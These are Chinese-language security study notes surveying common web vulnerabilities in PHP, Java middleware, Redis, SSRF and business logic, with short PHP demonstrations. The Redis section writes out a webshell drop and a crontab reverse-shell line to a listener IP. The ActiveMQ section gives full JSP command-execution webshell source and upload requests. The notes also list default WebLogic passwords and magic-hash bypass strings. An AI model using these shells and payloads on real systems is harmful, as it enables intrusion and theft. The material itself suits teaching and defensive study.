# 常见漏洞

&nbsp;

## php漏洞

### 【变量覆盖漏洞】

* **变量覆盖漏洞产生**
  * 变量如果未初始化，且能被用户所控制。
  * 在php中，若register_globals 为on时尤其严重
  此为全局变量覆盖漏洞

  * 当register_global=ON时，变量来源可能是各个不同的地方，比如页面的表单，Cookie等。

>一般利用代码审计能力发现

* **extract()变量覆盖**
  该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。该函数返回成功设置的变量数目。
  ```php
  <?php
  extract($_GET);  

echo $name.'<br>';
echo $age.'<br>';
echo $phone.'<br>';

//GET传参:?name=xiaohua&age=22&phone=112323123

//结果:
// xiaohua
// 22
// 112323123
?>
  ```
  * 有时使用extract会覆盖掉一些if中的检测变量，导致跳过if执行语句
  * 防御：不要使用或者在extract的参数中添加EXTR_SKIP  extract($_GET,EXTR_SKIP);

* **parse_str()变量覆盖**
  parse_str() 函数把查询字符串解析到变量中。如果未设置 array 参数，由该函数设置的变量将覆盖已存在的同名变量。php.ini 文件中的magic_quotes_gpc 设置影响该函数的输出。如果已启用，那么在 parse_str() 解析之前，变量会被 addslashes() 转换。
  ```php
  <?php
parse_str("name=xiaohua&age=22");
echo $name."<br>";
echo $age;
?>
//xiaohua
//22
  ```

* **import_request_variables()变量覆盖**
  (PHP 4 >= 4.1.0, PHP 5 < 5.4.0)
  import_request_variables — 将 GET／POST／Cookie 变量导入到全局作用域中，将 GET／POST／Cookie 变量导入到全局作用域中。如果你禁止了 register_globals，但又想用到一些全局变量，那么此函数就很有用。
  
  ```php
  import_request_variables ( string $types [, string $prefix ] ) : bool
  ```
  
* **$$变量覆盖**
  $$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现，如以下的示例代码，使用foreach来遍历数组中的值，然后再将获取到的数组键名作为变量，数组中的键值作为变量的值。因此就产生了变量覆盖漏洞。请求?name=test 会将$name的值覆盖，变为test。
  
  ```php
  <?php
  $name='thinking';
  foreach ($_GET as $key => $value)
  
  $$key = $value;   //这里进行了覆盖 $$key传入的值是name 传入进入成为$name 所以造成了name外部的变量被覆盖
  
  var_dump($key);
  var_dump($value);
  var_dump($$key);

echo $name;

//?name=test
//output:string(4) “name”
//string(4) “test”
//string(4) “test”
//test
  ```
  

### 【php弱类型漏洞】

* **==弱类型漏洞**
  PHP在使用双等号(==)判断的时候，不会严格检验传入的变量类型,同时在执行过程中可以将变量自由地进行转换类型。由于弱数据类型的特点，在使用双等号和一些函数时，会造成一定的安全隐患
  
  ```php
  <?php
    var_dump("admin"==0);  //true
    var_dump("1admin"==1); //true
    var_dump("admin1"==1); //false
    var_dump("admin1"==0); //true
    var_dump("0e123456"=="0e4456789"); //true 
?>
  ```
  * == 在进行比较的时候，会先将字符串类型转化成相同，再比较

  * === 在进行比较的时候，会先判断两种字符串的类型是否相等，再比较
  
* **Hash比较缺陷**
  研发人员在对比Hash2字符串的时候常常用到等于、不等于(!=)进行比较。如果Hash值以0e开头，后面都是数字，当与数字进行比较时，就会被解析成0x10n,会被判与0相等，攻击者可以绕过某些系统逻辑
  PHP在处理哈希字符串时，会利用”!=”或”==”来对哈希值进行比较，它把每一个以”0E”开头的哈希值都解释为0，所以如果两个不同的密码经过哈希以后，其哈希值都是以”0E”开头的，那么PHP将会认为他们相同，都是0。
  攻击者可以利用这一漏洞，通过输入一个经过哈希后以”0E”开头的字符串，即会被PHP解释为0，如果数据库中存在这种哈希值以”0E”开头的密码的话，他就可以以这个用户的身份登录进去，尽管并没有真正的密码。
  
  ```php
  <?php
  var_dump("0e123456789012345678901234567890"==="0"); //false
  var_dump("0e123456789012345678901234567890"=="0"); //true
  ?>
  ```
  * 加密后为0E的字符
  QNKCDZO
  0e830400451993494058024219903391
  
  s878926199a
  0e545993274517709034328855841020
  
  s155964671a
  0e342768416822451524974117254469
  
  s214587387a
  0e848240448830537924465865611904

  s214587387a
  0e848240448830537924465865611904

  s878926199a
  0e545993274517709034328855841020

  s1091221200a
  0e940624217856561557816327384675

  s1885207154a
  0e509367213418206700842008763514

  s1502113478a
  0e861580163291561247404381396064

  s1885207154a
  0e509367213418206700842008763514

  s1836677006a
  0e481036490867661113260034900752

  s155964671a
  0e342768416822451524974117254469

  s1184209335a
  0e072485820392773389523109082030

  s1665632922a
  0e731198061491163073197128363787

  s1502113478a
  0e861580163291561247404381396064

  s1836677006a
  0e481036490867661113260034900752

  s1091221200a
  0e940624217856561557816327384675

  s155964671a
  0e342768416822451524974117254469

  s1502113478a
  0e861580163291561247404381396064

  s155964671a
  0e342768416822451524974117254469

  s1665632922a
  0e731198061491163073197128363787

  s155964671a
  0e342768416822451524974117254469


* **bool比较缺陷**
  在使用json_decode()函数或使用unserialize()函数时，部分结构被解释成bool类型，也会造成缺陷。
  json_decode漏洞代码:
  ```php
  <?php 
  $str='{"user":true,"pass":true}';
  $data=json_decode($str,true);

if($data['user']=='root' && $data['pass']=='myPass'){
    print_r('登陆成功 获得flag{xx-ssss-xiaohua}');
}else{
    print_r('登陆失败！');
}
  ```
  
  unserialize漏洞代码:
  ```php
  <?php 
$str='a:2:{s:4:"user";b:1;s:4:"pass";b:1;}';
$data=unserialize($str);

if($data['user']=='root' && $data['pass']=='myPass'){
    print_r('登陆成功 获得flag{xx-ssss-xiaohua}');
}else{
    print_r('登陆失败！');
}
?>
  ```

* **数字转换比较缺陷**
  当赋值给PHP变量的整型超过PHP的最大值PHP_INT_MAX时，PHP将无法计算出正确的结果，攻击者可能会利用其跳过某些校验逻辑，如密码校验、账号充值校验等
  ```php
  <?php 
  $a=98869694308861098395599991222222222222;
  $b=98869694308861098395599992999999999999;

var_dump($a===$b);


?>
  ```
  
* **switch比较缺陷**
  当再switch中使用case判断数字时，switch会将其中的参数转换为int类型进行计算
  ```php
  <?php 
$num='2xiaohua';
switch($num){
    case 0:echo '000000';
    break;
    case 1:echo '1111';
    break;
    case 2:echo '2222222';
    break;
    case 3:echo '333333';
}

?>
  ```
  最终输出2222


* **数组比较缺陷**
  当使用in_array()或array_search()函数时，如果$strict参数吗有设置为true，则in_array()或array_search()将使用松散来判断$needle是否存在$haystack中
  ```php
  bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] )//strict默认为false
  miixed  array_search( mixed $needle , array $haystack [, bool $strict = FALSE ] )//strict默认为false
  ```
  
  

  


### 【PHP 反序列漏洞】*

* **反序列化漏洞**
  * php反序列化漏洞，又叫php对象注入漏洞。
  * php中有两个函数serialize() 和unserialize()。



### 【php伪协议】

PHP 提供了一些杂项输入/输出（IO）流，允许访问 PHP 的输入输出流、标准输入输出和错误描述符， 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

* **php://input**
  * php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下，最好使用 php://input 来代替 $HTTP_RAW_POST_DATA，因为它不依赖于特定的 php.ini 指令。 而且，这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充， 比激活 always_populate_raw_post_data 潜在需要更少的内存。 enctype="multipart/form-data" 的时候 php://input 是无效的。

* **php://filter**
  * php://filter/read=convert.base64-encode/resource=［文件路径］


&nbsp;


## JSP中间件漏洞

### 【Struts2漏洞】

* **什么是Structs2**
  * Struts是Apache基金会Jakarta项目组的一个开源项目，Struts通过采用Java Servlet/JSP技术，实现了基于Java EE Web应用的Model-View-Controller（MVC）设计模式的应用框架，是MVC经典设计模式中的一个经典产品。目前，Struts广泛应用于大型互联网企业、政府、金融机构等网站建设，并作为网站开发的底层模板使用，是应用最广泛的Web应用框架之一。

* **漏洞原理**
  * S2-051漏洞：
    REST插件使用了过时的XStream库，该库允许使用特殊构建的XML负载的恶意请求执行DoS攻击。
  * S2-052漏洞：
    Struts2 REST插件的XStream组件存在反序列化漏洞，使用XStream组件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，存在安全隐患，可被远程攻击。
  * S2-053漏洞：
    Struts2在使用Freemarker模板引擎的时候，同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析，但由于被Freemarker解析一次后变成了一个OGNL表达式，被OGNL解析第二次，导致任意命令执行漏洞。


* **漏洞挖掘**
  * （1）工具爬行
  * （2）找到存在漏洞地址例如：后缀：xxx.do，或者是 xxx.action
  * （3）用相关工具进行测试即可
>struts2中间件一般搭建在tomcat中，是以管理员身份运行的



### 【JAVA反序列漏洞】

* **序列化与反序列化**
  * 序列化：是指把Java对象转换为字节序列的过程便于保存在内存、文件、数据库中，ObjectOutputStream类的writeObject()方法可以实现序列化。
  * 反序列化：是指把字节序列恢复为Java对象的过程，ObjectInputStream类的readObject()方法用于反序列化

* **漏洞原理**
  * 重写Serializable接口中的readObject（）函数，使得原本执行原有的类的同时，加载了外界其他命令，污染了原本反序列化的流程

* **漏洞挖掘**
  * 从流量中发现序列化的痕迹，关键字：ac ed 00 05，rO0AB
  * Java RMI的传输100%基于反序列化，Java RMI的默认端口是1099端口
  * 从源码入手，可以被序列化的类一定实现了Serializable接口
  * 观察反序列化时的readObject()方法是否重写，重写中是否有设计不合理，可以被利用之处
  * 从可控数据的反序列化或间接的反序列化接口入手，再在此基础上尝试构造序列化的对象。


### 【Redis漏洞】

* **什么是Redis**
  * Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。

* **漏洞原理**
  * Redis 默认情况下，会绑定在 0.0.0.0:6379，，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的提供的config 命令，可以进行写文件操作，攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中，进而可以使用对应私钥直接使用ssh服务登录目标服务器。

* **漏洞挖掘**
  * redis绑定在 0.0.0.0:6379，且没有进行添加防火墙规则避免其他非信任来源 ip 访问等相关安全策略，直接暴露在公网；
  * 没有设置密码认证（一般为空），可以免密码远程登录redis服务。


* **漏洞危害**
  * （1）攻击者无需认证访问到内部数据，可能导致敏感信息泄露，黑客也可以恶意执行flushall来清空所有数据；
  * （2）攻击者可通过EVAL执行lua代码，或通过数据备份功能往磁盘写入后门文件；
  * （3）最严重的情况，如果Redis以root身份运行，黑客可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器


* **Redis漏洞利用**
  * 一旦控制 redis 后，优先想到的是写 webshell，容错性是它最大优势。假定目标是 PHP 环境、web 的根目录为/var/www/html，按前面步骤尝试写个普通 PHP 脚本看下是否能成功解析
    ```
    $ redis-cli -p 6379 -h 192.168.230.128
    192.168.230.128:6379> CONFIG SET dbfilename phpinfo.php
    192.168.230.128:6379> CONFIG SET dir "/var/www/html"
    192.168.230.128:6379> CONFIG SET rdbcompression no
    192.168.230.128:6379> SET phpinfo"\n\n <?php phpinfo(); ?> \n\n" NX
    192.168.230.128:6379> save
    ```
    
  * 将反弹shell脚本写入/etc/crontab
    ```
    set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.8.124/1122 0>&1\n\n\n\n"
    config set dir /etc/
    config set dbfilename crontab
    save
    nc -l -p 1122
    ```
    
  * 利用MSF 破解Redis弱口令导入ssh公钥链接
    ```
    auxiliary/scanner/redis/file_upload   #该exp功能为上传本地的文件到目标服务器。
    auxiliary/scanner/redis/redis_login   #该exp功能是对redis的密码进行枚举，亲测速度很快。
    auxiliary/scanner/redis/redis_server   #该exp功能是验证枚举或者其他手段得到的redis密码是否正确，该功能会执行一个info命令并返回执行结果。
    ```
    
  * 上传文件ssh密钥
    ```
    auxiliary/scanner/redis/file_upload  上传文件模块
    ssh-keygen -t rsa
    cd /root/.ssh/
    cp id_rsa.pub  authorized_keys
    vi authorized_keys
    在文件内容得前面和后面都加上\n\n\n
    为了能正常上传测试，在目标机器上创建/root/.ssh 目录
    mkdir /root/.ssh
    ssh -i id_rsa root@192.168.230.128
    ```

### 【SSRF漏洞】

* **SSRF**
  * SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）
  >一般是jsp网站会有

* **漏洞原理**
  * 用户在地址栏输入网址 --》 向目标网站发送请求 --》 目标网站接受请求并在服务器端验证请求是否合法，然后返回用户所需要的页面 --》用户接收页面并在浏览器中显示
  * 【此处的请求默认为www.xxx.com/a.php?image=（地址）】
  * 终极简析: SSRF漏洞就是通过篡改获取资源的请求发送给服务器，但是服务器并没有发现在这个请求是合法的，然后服务器以他的身份来访问其他服务器的资源。

* **漏洞挖掘**
  * 分享：通过URL地址分享网页内容
  * 转码服务
  * 在线翻译
  * 图片加载与下载：通过URL地址加载或下载图片
  * 图片、文章收藏功能
  * 未公开的api实现以及其他调用URL的功能
  * 从URL关键字中寻找

* **漏洞利用**
  * 可以通过伪协议dict对内网中的端口进行扫描


&nbsp;



## 业务逻辑漏洞

### 【商品数据逻辑漏洞】

* **漏洞挖掘**
  * 首先发送正常的数据包，了解整个数据交换流程，以及页面跳转

* **漏洞利用**
  * 订单ID篡改
    查看自己订单，修改 订单ID查看是否能查看其他订单信息
    
  * 商品编号篡改
    积分商城，利用低积分兑换高积分礼物
    选取低积分礼物兑换，提交抓包
    修改其中的 goods_id（商品编号）为高积分的商品编号
    提交，就可以发现逻辑漏洞的实现
    
  * 用户ID篡改
    抓包查看自己的 用户ID，修改 ID查看是否能查看其他用户信息
    
  * 金额 篡改
    抓包修改金额等字段
    将支付页面抓取请求中商品的金额字段，修改成任意数额的金额（如负数）
    提交，查看能否以修改后的金额数据完成业务流程
    
  * 商品数量 篡改
    抓包修改商品数量等字段
    很多商品限制用户购买数量，服务器仅在页面通过 `JS` 脚本限制，未在服务端校验用户提交的数量，通过抓包修改商品最大限制数量，即将请求中的商品数量改为大于最大数值限制，查看是否能完成修改后的数量完成业务流程
    
### 【认证模块逻辑漏洞】

* **漏洞利用**
  * 暴力破解
    在 没有 验证码限制或者一次验证码可以使用 多次 使用的情况下
    使用已知用户名对密码进行暴力破解
    使用一个弱口令密码对用户进行暴力破解
    
  * Cookie 仿冒欺骗
    通过修改 Cookie中的某个参数来实现登录其他用户
    或者直接进去后台，代码验证设计缺陷导致，一些网站会利用 Cookie 是否为空、Session是否为 true 来判断用户是否可以登录，只要构造一个 Cookie或 Session为 true就可以绕过认证登录
    >一般从代码审计得出的漏洞，黑盒很难找出这样的漏洞

  * 前端js代码验证
    js禁用可以绕过，对于按钮使用审查url，通过url进行访问
    也可以使用burpsuit拦截页面绕过
    
  * 服务器响应欺骗
    通过抓取某请求包拦截对应响应包来修改服务器的响应
    修改位置：
      响应码
      修改返回数据包内容：
      例如增删js代码
      把包中false改成true
      0改成1
      把no改成yes
      可以通过前台账号登录成功的响应页面来参考修改后台。
  
  * 密码重置逻辑
    尝试正常密码找回流程
    选择不同的找回方式，记录所有数据包
    分析数据包，找出敏感部分
    分析后台找回机制所采用的验证手段
    修改数据包进行验证是否存在密码找回漏洞(爆破验证码（有时验证码是前端生成）)
    
  * 用户凭证暴力破解
    四位或六位纯数字，验证码次数未限制
    根据手机号找回密码，随便输个验证码，抓包,暴力破解验证码（假如只有四位），很快就可以破解出来
    >注意：如果验证码次数限制，破解一会就会提示请求过于频繁，这时就需要绕过限制
    
    限制绕过：国内很多情况下都没有过滤字符和限制输出长度，验证很有可能只是简单的处理
    
  * 修改请求参数
    指定别人用户密码找回在接收验证码的时候抓包，把发送验证码的邮箱或者手机号改成自己的。
    指定自己密码找回最后提交的时候抓包吧用户名或者用户id改成别人的。
    修改提交的响应包来欺骗服务器验证。
    注册重复的用户名，例如 admin，相当于修改了密码
    
  * 重新绑定
    给已知账户绑定手机，发现绑定手机的 URL 链接中有 uid 参数，修改 uid 参数为他人的，即可实现将他人的账户绑定上自己的手机，之后通过手机来修改密码
    修改个人资料处抓包，修改 userId 为他人，修改mobilePhone 为自己的手机，即可实现将他人的账户绑定上自己的手机，之后通过手机来修改密码
    
  * 跳过找回步骤
    跳过验证步骤、找回方式、直接到设置新密码页面
    
  * 绕过授权验证
    水平越权:水平越权是指同等权限级别越权
    纵向越权:纵向越权是指不同等权限级别越权
    漏洞出现点：
    数据交互的地方
    用户可操作的地方
    参数可控制的地方
    
### 【业务流程模块逻辑漏洞】

* **漏洞利用**
  * 业务重放测试
    在生成的订单流程时抓取订购请求
    观察每次订购相同商品的请求是否存在不同的随机token、可变参数等，若有则检查这些随机的变化情况和失效情况，是否在当前订购流程中唯一有效
    尝试重放之前已经完成流程的订购请求，观察服务器是否做出正确响应，若订购再次生效，则存在该漏洞。
    
  * 业务上限测试
    该测试主要判断应用程序是否对业务预期范围外的业务请求做出正确响应。
  * 业务流程乱序测试
    乱序测试主要是对业务流程是否正常，确保攻击者无法通过技术手断绕过某些重要流程步骤，检验办理业务过程中是否有可控制来保证其遵循正常流程。
    


## 其他web中间件漏洞

### 【tomcat远程命令执行漏洞(CVE-2017-12615)影响范围Apache Tomcat 7.0.0 – 7.0.81】

* **漏洞验证**
  * 利用PUT方法上传构造好的shell
  * 在构造上传方法时有三种
    PUT /test.jsp%20
    PUT /test.jsp/
    PUT /test.jsp:DATA
  * 通过构造特殊的后缀来绕过，Tomcat的检测，将jsp的shell上传到服务器中。
  * 利用上传的shell来进行命令执行
  * http://192.168.230.131:8080/test.jsp?cmd=ipconfig

### 【Apache ActiveMQ Fileserver远程代码执行漏洞】

* **漏洞挖掘**
  * 扫端口的时候遇到8161端口，输入admin/admin
  * 通过put上去一句话然后move移动到admin目录即可拿shell

* **漏洞利用**
  * 获取物理路径
    ```
    PUT /fileserver/%20/%20 HTTP/1.1
    ```
  * PUT 一个 Jsp 的 Webshell 到 fileserver 目录
    ```
    PUT /fileserver/1.jsp HTTP/1.1 
    <%@ page import="java.io.*"%>
    <%
    out.print("Hello</br>");
    String strcmd = request.getParameter("cmd");
    String line =null;
    Process p=Runtime.getRuntime().exec(strcmd);
     InputStream is = p.getInputStream();
      BufferedReader br = new BufferedReader(new InputStreamReader(is));
    while((line =br.readLine())!=null){
        out.print(line+"<br>");
    }
    %>
    ```
  * 利用 MOVE 方法将 Webshell 移入 admin/ 目录
    MOVE /fileserver/1.jsp  HTTP/1.1
    Destination:file://C:\activemq\webapps\admin\11.jsp
    
### 【weblogic攻击】

* **漏洞挖掘**
  * 批量扫描WebLogic缺省的WEB管理端口（http为7001，https为7002），开放这两个端口的一般都是安装有WebLogic的主机。
  * Google搜索关键字“WebLogic Server Administration Console inurl:console”，URL后面是console结尾的，一般为目标。

* **漏洞挖掘**
  * 尝试弱口令登录
    1、用户名密码均为：weblogic 
    2、用户名密码均为：system 
    3、用户名密码均为：portaladmin 
    4、用户名密码均为：guest
  
  * 登录后找到“mydomain”->“Deployments”->“Web Application Modules”->“Deploy new Web Application Moudule...”
  * 再点里面的“upload your file(s)”，在跳转后的页面上传war包（war包和Tomcat弱口令利用的包一样，注意马的免杀即可）


### 【PHPstudy RCE 漏洞复现】



### 【心脏滴血漏洞】

* **漏洞范围**
  * OpenSSL1.0.1版本

* **漏洞成因**
  * Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容，这样一来受害者的内存内容就会以每次64KB的速度进行泄露。


* **漏洞危害**
  * 如同漏洞成因所讲，我们可以通过该漏洞读取每次攻击泄露出来的信息，所以可能也可以获取到服务器的私钥，用户cookie和密码等。